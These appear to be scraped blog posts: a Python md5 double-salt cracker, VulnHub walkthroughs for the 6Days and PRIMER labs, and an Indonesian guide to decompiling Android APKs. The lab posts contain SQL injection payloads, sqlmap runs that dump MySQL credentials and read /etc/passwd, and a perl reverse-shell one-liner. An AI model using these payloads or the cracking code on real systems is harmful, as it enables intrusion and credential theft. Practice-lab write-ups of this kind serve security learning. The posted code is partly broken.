Simple python code for crack md5 double salt

I want to share my simple python code for crack md5 double salt, not perfect but it can be used
This encryption format looks like

md5($salt + $password + $salt)

because I was curious about the password, finally I tried to make a simple code with python for crack the hash


File hash:

This encryption that I get with the hash format $md5 + $salt, and i found the static salt at the source code example like “Idontwanttosharethissalt”


Cracking start:

Thank you,
indahnya berbagi 😀



#title : crack md5 double salt
#author: f3ci
#date  : 2016-08-09

import hashlib, os, sys
import time

	dict = sys.argv[2]
	file = sys.argv[1]
	print "[+] Usage: " + os.path.basename(__file__) + " hashfile wordlistfile"
	print "[+] Example: " + os.path.basename(__file__) + " hash.txt rockyou.txt"

staticsalt = "Idontwanttosharethissalt"
start = time.time()
end  = time.time()
class nonlocal:
    recover = 0

#parsing hash dan salt
def main():
	with open(file) as hashfile:
		print "[+] Cracking start"
		global hashsum
		hashsum = sum(1 for _ in hashfile)
		print "[+] Total Hash : %s\n" % (hashsum)
	with open(file) as hashfile:
		salt = []
		hash = []
		for i in hashfile:
			pars = i.strip()
			hash = pars[0:32]
			salt = pars[33:]
			global salting
			salting = salt
			global crackdah 
			crackdah = hash
	print "\n[+] Recovered  : %s/%s" % (nonlocal.recover, hashsum)
	print ("[+] Total Time : %s seconds " % format(time.time() - start))

#open wordlist 
def crack():
	with open(dict) as dictfile:
		for n in dictfile:
			pwd = n.strip()
			global password
			password = pwd
			if hashlib.md5(staticsalt+password+salting).hexdigest() == crackdah:
				print "%s : %s" % (crackdah, password)
				nonlocal.recover += 1
				return main	

except (KeyboardInterrupt, SystemExit):
	print "\n[+] Recovered      : %s/%s" % (nonlocal.recover, hashsum)
	print "[+] Not Recovered  : %s" % (hashsum - nonlocal.recover)	
	print ("[+] Total Time     : %s seconds " % format(time.time() - start))
	print "\n[-] Exit"

The post Simple python code for crack md5 double salt appeared first on 09 Aug 2016.


6 Days Lab 1.1 Vulnhub

Hello 😀

This is my walkthrough for 6Days Lab


Look at the web app…

Look at the page source…

Before I check the image.php, I want to try input something on the promocode form..

I try to use sqlmap with tamper chardoubleencode option, but it’s not successful. I think because the ips, let’s find another way… Then I find local file disclosure vulnerability on this web app, this has happened because the target using readfile function on image.php for getting images from a file or other site.


Stuck with this vulnerability for several hours… But after I try to look at the apache configuration on the server target and look at back to nmap result I have an idea for another attack.


With the local file disclosure vulnerability we can take advantage for access port 8080 from the target. Then, if we look at the checkpromo.php this code has vulnerabilities (SQL injection). But because the IPs block all malicious code from external this SQL injection vulnerability cannot be exploited.


Okay, let’s see if we do the injection from local target what that IPS still block all malicious requests or not??


' union all select schema_name,null from information_schema.schemata#

Don’t forget to double encode your payload.

Whoops… nice response from the target, but we should find the right payload for this injection. Look at back to the checkpromo.php code.

On the checkpromo.php source code has stated if row “status” = 0 targets will be answered “Code expired!” then we can send a payload that is slightly different from the previous. Change “null” with number let’s say 1 or 2 or 3.


' union all select schema_name,1 from information_schema.schemata#


Okeh bro, I made a small code to perform the injection in order to more easily

import urllib,urllib2

url = ""
def encode(sqli):
	enc = urllib.quote_plus(sqli)
	doubleenc = urllib.quote_plus(enc)
	print "Request : " + url + doubleenc + "\n"
def request(doubleenc):
	request = urllib2.urlopen(url+doubleenc)
	response =
	print response

encode("union all select concat(username,':',password),1 from fancydb.users#")


Yapp, we have credentials right now. As we know ssh open on the target and try to login ssh with user “andrea”

Nice one we successful login, but there was a problem caused we got an escaping restricted shell.

:):):):):):) but Offsec say Try Harder!

Easy way out from this escaping restricted shell, we can use python or perl or another language for reverse shell, in this case I use perl for reverse this shell.

Perl code:

perl -e 'use Socket;$i="";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


We got a real shell now, in there has a dog binary but, I don’t have an idea to rooted this box using dog binary. I just check the kernel and OS version then exploit with “overlayfs” vulnerability.


Local Exploit


Thank you vulnhub!

Penetration Test Aplikasi Mobile Android Part 1

Hello fellas,

Saya mau coba share cara pentes aplikasi mobile di android nih masih newbee juga sih, tapi semoga bermanfaat 😀
mulai dari static analysis tools yang saya pake :

  • dex2jar
  • jd-gui

Seperti biasanya kalo yang namanya .apk cuma file archive doang kita bisa langsung extract, caranya rename dulu jadi .zip terus extract deh atau bisa pake apktool buat decompile .apk nya2016-06-07_00-49-46

Terus kalo udah di extract/decompile jadinya kaya diatas tuh, nah bakalan ketemu file .dex itu Dalvik Executeable bisa cari di google kalo kepo tentang Dalvik itu apa.

Disini ada dua file .dex itu tergantung aplikasinya kadang satu, kadang dua atau bisa lebih dari dua, gausah bingung ujungnya bakal sama aja kok mau berapapun file .dex nya.

Pertama kita pake tools dex2jar buat decompile .dex menjadi .jar


Kalo udah jadi .jar kaya diatas kita bisa open .jar nya pake jd-gui atau kita extract lagi .jar nya sekarang kita coba dulu buka pake jd-gui2016-06-07_01-29-15

Nah kalo .jar nya di open bakal kaya diatas tuh si jd-gui punya kemampuan buat baca file .class jadi source code javanya keliatan semua deh, jd-gui juga bisa nge-decompile .class nya jadi .java tinggal save all sources di menu file.

Terus enak banget dong kalo semua isi .apk source nya bisa dibaca semua orang?? jawaban nya betul semua orang bisa baca source code yang ada di dalem .apk tapi ada caranya untuk mencegah attacker ngebaca alur program yang ada, pake teknik obfuscate jadi semua class, variable dll yang ada di source bakalan di acak-acak, kira-kira kaya gini nih contoh yang di obfuscate.


Kaya diatas gitu tuh setau saya cara mencegah agar attacker sulit baca alur program, pada source code di obfuscate jadi nama class, variable dll nya jadi a,b,c,d sampe seterusnya, bikin agak ribet aja sih tapi kayanya kalo dibaca pelan pelan juga attackernya ngerti2 juga 😀

Biar gampang analisanya kita decompile lagi nih .class jadi .java biar kalo di grep enak, kan susah tuh kalo ketemu yg .class nya banyak dibaca di jd-gui satu-satu pegel juga. Dari jd-gui tinggal pilih menu file terus pilih “save all sources”.

2016-06-07_02-30-15Nanti bakalan jadi zip terus extract deh kaya diatas tuh. Lanjut kita cari backend/api nya ini aplikasi kemana ya biasanya kalo source nya ga di obfuscate alamat ip sama path url nya bisa keliatan hehe

2016-06-07_02-37-47Ketemu juga tuh ip sekalian sama portnya, saya filter cari kata “http” di semua source .java nya akhirnya dapet 1 ip sama 1 domain, nah sekarang mau filter berdasarkan alamat ipnya biar keliatan ada url apa aja di dalem aplikasi ini.

2016-06-07_02-46-16Yap selamat kita dapet semua url yang dia request serenceng sama method apa yang dia gunain dan parameter apa aja yang dibutuhin. Di kasus ini saya grep terakhir di port 3006 karena setelah di lihat-lihat port 3006 nya untuk store data dan port 3002 nya cuma untuk upload image. Kita lanjut part 2 see yaa..



PRIMER 1.0.1 (SQL injection)

Mengisi waktu luang sore hari,

Lab PRIMER 1.0.1 –,136/?override=1

Starting with nmap

root@kali:~# nmap -sC -sV

Starting Nmap 7.01 ( ) at 2016-02-20 14:57 WIB
Nmap scan report for
Host is up (0.00017s latency).
Not shown: 997 closed ports
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 01:2e:60:5f:99:48:3b:2f:c0:72:c6:ae:48:02:5e:33 (DSA)
|   2048 ed:26:be:cc:c6:2a:93:d1:e1:6d:0d:5a:53:7b:4d:fb (RSA)
|_  256 7f:4e:64:a0:c4:8a:13:8e:e9:86:3d:5d:49:04:c4:54 (ECDSA)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37649/tcp  status
|_  100024  1          47277/udp  status
MAC Address: 00:0C:29:0D:92:09 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds


Check port 80
2016-02-20_16-38-12Hmm let’s check another interesting page at :
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PRIMER


click “EOF” button


after open this page, you can watch my short video for get more interesting page


try to check all urls that you already get


this url seems like md5 encryption, let’s separate this urls and decrypt this md5.
watch my short video “again” for the next step 😀

and.. stuck “again” …
after several minutes, i still have no idea on this terminal at the web page, so i just back to the home page and try to exploit form login with sqlmap

root@kali:~# sqlmap -u "" --form --dbs
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201601180a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:05:10

[15:05:10] [INFO] testing connection to the target URL
[15:05:10] [INFO] searching for forms
[#1] form:
POST data: usr=&pw=&commit=Login
do you want to test this form? [Y/n/q] 
Edit POST data [default: usr=&pw=&commit=Login] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] n
[15:05:13] [INFO] using '/root/.sqlmap/output/results-02202016_0305pm.csv' as the CSV results file in multiple targets mode
sqlmap got a 302 redirect to ''. Do you want to follow? [Y/n] n


[15:05:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[15:05:25] [INFO] POST parameter 'usr' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:05:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:05:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:05:28] [INFO] checking if the injection point on POST parameter 'usr' is a false positive
POST parameter 'usr' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 95 HTTP(s) requests:
Parameter: usr (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: usr=' AND (SELECT * FROM (SELECT(SLEEP(5)))hAik) AND 'vdbv'='vdbv&pw=&commit=Login
do you want to exploit this SQL injection? [Y/n] 
[15:05:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[15:05:46] [INFO] fetching database names
[15:05:46] [INFO] fetching number of databases
[15:05:46] [INFO] retrieved: 
[15:05:46] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:05:58] [INFO] retrieved: 
[15:06:03] [INFO] adjusting time delay to 1 second due to good response times
[15:07:14] [INFO] retrieved: mysql
[15:07:34] [INFO] retrieved: performance_schema
[15:08:44] [INFO] retrieved: phpmyadmin
[15:09:27] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

[15:09:44] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0305pm.csv'

[*] shutting down at 15:09:44

current db is “test” but there is nothing interesting in this database, just try to dump mysql database to get password root mysql

root@kali:~# sqlmap -u "" --form -D mysql -T user -C User,Password --dump


Database: mysql
Table: user
[6 entries]
| User             | Password                                  |
| debian-sys-maint | *0A799FB65F1A7F8E0B0F9C7CBE0983029BDF3D63 |
| phpmyadmin       | *EDDB5D9F648E137B72DC65A9904FBFC9FC4A4C25 |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |
| root             | *5452363E0EE57308206123984E21A8F6ECFF23CA |

[19:13:31] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/'
[19:13:31] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0713pm.csv'

[*] shutting down at 19:13:31

then decrypt root hash password, and whopss.. root password for mysql is “PRIMER”

so what are the advantages that we can get from this password?
try to check the privilege we are database administrator or not, like usually if we can dump mysql database the privilege is “dba” then try to read file from the back-end

root@kali:~# sqlmap -u "" --form --threads=5 --file-read="/etc/passwd"


[19:29:59] [INFO] the local file '/root/.sqlmap/output/' and the remote file '/etc/passwd' have the same size (1493 B)
files saved to [1]:
[*] /root/.sqlmap/output/ (same file)

[19:29:59] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-02202016_0729pm.csv'

[*] shutting down at 19:29:59

Wohooo.. [*] /root/.sqlmap/output/ (same file) means that the file was successfully extracted


list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

there is an existing user on this machine, then try to login ssh service with user “nieve” and password “PRIMER”
but wait… password “PRIMER” is root password for mysql, let’s to try to get root privilege with this password just try my luck
i don’t know this is the right way or not but this is my way i love my way :p

MYSQL Credentials

User Machine Credentials

Terminal Web – passwod for connect to host




Thank you PRIMER and vulnhub!